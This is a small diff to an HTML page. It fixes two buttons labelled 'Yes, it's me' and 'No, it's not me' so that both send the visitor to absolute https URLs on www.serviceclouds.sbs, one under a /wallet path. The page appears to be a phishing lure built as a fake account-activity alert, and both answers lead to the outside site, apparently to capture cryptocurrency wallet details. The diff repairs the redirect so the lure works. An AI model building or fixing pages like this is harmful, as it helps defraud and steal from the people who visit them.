--- a/index.html
+++ b/index.html
@@ -119,8 +119,8 @@
       <line x1="20" y1="50" x2="44" y2="26" stroke="#dc2626" stroke-width="4" stroke-linecap="round"/>
     </svg>
     <div class="btn-group">
-      <button class="yes" onclick="window.location.href='www.serviceclouds.sbs'">Yes, it's me</button>
-      <button class="no" onclick="window.location.href='www.serviceclouds.sbs/wallet'">No, it's not me</button>
+      <button class="yes" onclick="window.location.href='https://www.serviceclouds.sbs'">Yes, it's me</button>
+      <button class="no" onclick="window.location.href='https://www.serviceclouds.sbs/wallet'">No, it's not me</button>
     </div>
   </div>
 </body>
